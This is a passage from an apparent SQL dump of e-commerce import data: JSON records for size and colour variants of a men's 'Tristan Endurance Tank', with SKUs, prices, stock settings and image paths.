_options=0,required_options=0,size=XS,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Gray\"},\"593\":{\"sku\":\"MT02-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-XS-Red\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"594\":{\"sku\":\"MT02-XS-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-XS-White\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-xs-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt02-white_alt1.jpg,\\/m\\/t\\/mt02-white_back.jpg,\\/m\\/t\\/mt02-white_sideb.jpg\",\"image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt02-white_alt1.jpg,\\/m\\/t\\/mt02-white_back.jpg,\\/m\\/t\\/mt02-white_sideb.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"White\"},\"595\":{\"sku\":\"MT02-S-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-S-Gray\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-s-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Gray\"},\"596\":{\"sku\":\"MT02-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-S-Red\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"597\":{\"sku\":\"MT02-S-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-S-White\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-s-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt02-white_alt1.jpg,\\/m\\/t\\/mt02-white_back.jpg,\\/m\\/t\\/mt02-white_sideb.jpg\",\"image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt02-white_alt1.jpg,\\/m\\/t\\/mt02-white_back.jpg,\\/m\\/t\\/mt02-white_sideb.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"White\"},\"598\":{\"sku\":\"MT02-M-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-M-Gray\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-m-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Gray\"},\"599\":{\"sku\":\"MT02-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-M-Red\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(7, 'catalog_product', 'append', '{\"600\":{\"sku\":\"MT02-M-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-M-White\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"tristan-endurance-tank-m-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/t\\/mt02-white_alt1.jpg,\\/m\\/t\\/mt02-white_back.jpg,\\/m\\/t\\/mt02-white_sideb.jpg\",\"image\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/t\\/mt02-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/t\\/mt02-white_alt1.jpg,\\/m\\/t\\/mt02-white_back.jpg,\\/m\\/t\\/mt02-white_sideb.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},\"601\":{\"sku\":\"MT02-L-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Tanks\",\"product_websites\":\"base\",\"name\":\"Tristan Endurance Tank-L-Gray\",\"description\":\"<p>Push yourself through punishing runs, plyometric workouts, intense competition and more in our athletic Tristan Endurance Tank. Constructed with built-in moisture-wicking technology, it\'s designed to keep you completely cool and dry on the long haul.<\\/p>\\n<p>&bull; White performance tank.<br \\/>&bull; Stylish contrast stitching. <br \\/>&bull; Relaxed fit. <br \\/>&bull; Ribbed crew neckline. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 